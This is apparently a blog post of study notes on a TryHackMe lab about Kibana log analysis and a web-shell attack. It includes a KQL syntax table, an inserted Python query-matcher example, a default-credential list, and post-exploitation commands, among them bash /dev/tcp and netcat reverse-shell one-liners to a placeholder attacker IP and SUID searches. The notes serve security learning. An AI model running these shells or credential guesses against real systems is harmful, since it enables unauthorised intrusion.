Post 63 - Twice in three days

07 Dec 2024

Task 9, Day 3: Log analysis

Even if I wanted to go, their vulnerabilities wouldn’t allow it.

Operation Blue

Log analysis is crucial to blue-team work.

ELK combines data analytics and processing tools to make log analysis manageable, forming a dedicated stack that aggregates logs from multiple sources into one central place. Today starts with the Kibana Discover interface.

Query/Syntax | Description | Example
" " | Search for specific values (exact search). | "TryHackMe"
* | Wildcard for similar matches to the value provided. | United* (returns United Kingdom and United States)
OR | Shows documents that contain either value provided. | "United Kingdom" OR "England"
AND | Shows documents that contain both values provided. | "Ben" AND "25"
: | Search a specific field in the document; which fields are available depends on the document. | ip.address: 10.10.10.10

Noise can be filtered out by selecting/unselecting certain fields; adding a field through the GUI just applies the correct KQL syntax for you. Specific values in a field can also be filtered by clicking the field in the left pane and adding/removing them with +/-. Click and drag on the timeline to select the time range covered by the search.
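To make the query syntax in the table concrete, here is a small matcher for that subset of KQL (quoted exact values, * wildcards, AND/OR with KQL's precedence, and field: value) run over a few constructed documents. This is an added example, not code from the post or from Kibana; the field names and documents are assumptions.

```python
import re
from fnmatch import fnmatchcase

# Constructed sample documents standing in for Kibana Discover hits (not real data).
DOCS = [
    {"ip.address": "10.10.10.10", "country": "United Kingdom", "msg": "login admin"},
    {"ip.address": "10.10.10.11", "country": "United States", "msg": "upload shell.php"},
    {"ip.address": "192.168.1.5", "country": "England", "msg": "TryHackMe"},
]

# A token is `field: value` (space after the colon allowed), a "quoted phrase",
# or a bare word (which may be the AND / OR operator).
TOKEN = re.compile(r'([\w.]+)\s*:\s*("[^"]*"|\S+)|("[^"]*"|\S+)')

def _value_matches(pattern, text):
    """Quoted = exact match; `*` = wildcard; bare = whole-word match.
    Comparisons are case-insensitive here, a simplification of real KQL."""
    if pattern.startswith('"') and pattern.endswith('"'):
        return pattern[1:-1].lower() == text.lower()
    if "*" in pattern:
        return fnmatchcase(text.lower(), pattern.lower())
    return pattern.lower() in text.lower().split()

def _term_matches(field, pattern, doc):
    """`field: value` searches one field; a bare value searches every field."""
    names = [field] if field else list(doc)
    return any(_value_matches(pattern, str(doc[n])) for n in names if n in doc)

def kql_match(query, doc):
    """AND binds tighter than OR, as in KQL: split into OR groups of AND terms."""
    or_groups, current = [], []
    for m in TOKEN.finditer(query):
        field, value, bare = m.groups()
        if bare is not None and bare.upper() in ("AND", "OR"):
            if bare.upper() == "OR":
                or_groups.append(current)
                current = []
            continue
        current.append((field, value if field else bare))
    or_groups.append(current)
    return any(all(_term_matches(f, p, doc) for f, p in g) for g in or_groups if g)

def search(query, docs=DOCS):
    """Return the documents a Discover query would keep, in original order."""
    return [d for d in docs if kql_match(query, d)]

if __name__ == "__main__":
    for q in ["United*", '"United Kingdom" OR "England"']:
        print(q, "->", [d["country"] for d in search(q)])
```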

Operation Red

Unrestricted File Uploads

Without the website validating things like file type, size and file contents, an upload form can open the door to attacks on the web server.

Usage of Weak Credentials

One of the easiest paths of attack is weak or default credentials. Common weak/default credentials an attacker might try:

Username | Password
admin | admin
administrator | administrator
admin@domainname | admin
guest | guest

RCE and Web Shells

Commands to try after exploiting the vulnerability (command, then its use):

ls
    Gives an idea of the files and directories around you
cat
    Outputs the contents of documents like text files
pwd
    Gives an idea of where in the system you are
whoami
    Lets you know who you are
hostname
    System name and potentially its role
uname -a
    System info like OS, kernel version, etc.
id
    Shows any groups the current user is assigned to
ifconfig
    Network setup info
bash -i >& /dev/tcp/<your-ip>/<port> 0>&1
    Begins a reverse shell via bash
nc -e /bin/sh <your-ip> <port>
    Begins a reverse shell via Netcat
find / -perm -4000 -type f 2>/dev/null
    Finds SUID files, useful for privesc
find / -writable -type f 2>/dev/null | grep -v "/proc/"
    Finds files with writable permissions

The Task

Investigate the attack in Kibana to answer blue's questions, then recreate the attack to answer red's questions. Had to watch the end of the video to get my shell going.

Advanced ELK queries room(?).